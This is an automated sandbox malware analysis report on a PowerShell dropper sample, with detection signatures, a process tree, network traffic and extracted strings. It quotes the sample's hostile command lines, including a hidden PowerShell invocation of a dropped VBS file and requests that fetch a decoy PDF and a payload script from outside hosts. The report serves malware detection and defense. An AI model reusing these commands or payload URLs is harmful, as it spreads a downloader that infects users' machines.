Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2rTi9MgX25.ps1

Overview

General Information

Sample name:2rTi9MgX25.ps1
renamed because original name is a hash value
Original sample name:89e06f26911f39129d6fb9ed523e53c44804c96031924c4f2ee754a49dd278cf.ps1
Analysis ID:1578221
MD5:28e4d353dd649e9252cb62d9be6fb391
SHA1:16ecf4dcec8d1bdf466de38daf89b4d39af55834
SHA256:89e06f26911f39129d6fb9ed523e53c44804c96031924c4f2ee754a49dd278cf
Tags:185-236-228-9287-120-112-91ps1www-al-rasikh-comuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7572 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7796 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 8044 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 1408 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 7588 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1636,i,14229449947931004828,5729457829333662264,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 3812 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7572JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_7572.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7572, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'", ProcessId: 7796, ProcessName: powershell.exe
      Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
      Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7572, TargetFilename: C:\Users\Public\iys.vbs
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1", ProcessId: 7572, ProcessName: powershell.exe
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7572, TargetFilename: C:\Users\Public\iys.vbs
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1", ProcessId: 7572, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3812, ProcessName: svchost.exe

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: 2rTi9MgX25.ps1Avira: detected
      Multi AV Scanner detection for submitted file
      Source: 2rTi9MgX25.ps1ReversingLabs: Detection: 34%
      Source: 2rTi9MgX25.ps1Virustotal: Detection: 41%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.9% probability
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.7:49712 version: TLS 1.2
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbl source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA9C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA9C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1404370506.000001E357BFD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BACC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1622343797.0000025F5B9FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BACC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb$M| source: powershell.exe, 00000001.00000002.1622343797.0000025F5B9FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb) source: powershell.exe, 00000004.00000002.1402712060.000001E357A9B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb source: powershell.exe, 00000004.00000002.1402712060.000001E357A9B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ows\dll\System.pdb source: powershell.exe, 00000001.00000002.1618094806.0000025F5B805000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA9C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA79000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbFu source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA64000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1403370389.000001E357B31000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb6vi source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA64000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbeN source: powershell.exe, 00000004.00000002.1403370389.000001E357B31000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb7M source: powershell.exe, 00000001.00000002.1622343797.0000025F5B9FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA9C000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 203.175.174.69 203.175.174.69
      Source: Joe Sandbox ViewIP Address: 107.161.23.150 107.161.23.150
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.astenterprises.com.pk
      Source: global trafficDNS traffic detected: DNS query: www.bluemaxxlaser.com
      Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 11:44:33 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F4514F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://astenterprises.com.pk
      Source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
      Source: svchost.exe, 00000009.00000002.2582093063.0000014B43400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.9.dr, qmgr.db.9.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3400D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
      Source: powershell.exe, 00000001.00000002.1603217844.0000025F53817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1603217844.0000025F536D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F43661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E33F651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F4514F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.astenterprises.com.pk
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F451A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1520565660.0000025F451E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F451A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com/ms/ms.vbs
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F43892000.00000004.00000800.00020000.00000000.sdmp, 2rTi9MgX25.ps1String found in binary or memory: http://www.blujlqmaxxlasjlqr.com/ms/ms.vbs
      Source: powershell.exe, 00000001.00000002.1622194811.0000025F5B900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
      Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.drString found in binary or memory: http://x1.i.lencr.org/
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F43661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E33F651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000004.00000002.1378720785.000001E340962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
      Source: powershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
      Source: svchost.exe, 00000009.00000003.1475779786.0000014B432D0000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
      Source: powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F44292000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E340962000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E3400D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E33FF54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000001.00000002.1603217844.0000025F53817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1603217844.0000025F536D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: qmgr.db.9.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
      Source: ReaderMessages.6.drString found in binary or memory: https://www.adobe.co
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F44C92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1520565660.0000025F4514B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F44C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F44C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf
      Source: powershell.exe, 00000001.00000002.1520565660.0000025F44C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astjlqntjlqrprisjlqs.com.pk/ms/List%20of%20rjlqquirjlqd%20itjlqms%20and%20sjlqrvicjlqs.p
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.7:49712 version: TLS 1.2
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: classification engineClassification label: mal84.evad.winPS1@20/59@5/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\List of Required items and services.pdfJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qspzcx0m.yll.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: 2rTi9MgX25.ps1ReversingLabs: Detection: 34%
      Source: 2rTi9MgX25.ps1Virustotal: Detection: 41%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1636,i,14229449947931004828,5729457829333662264,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
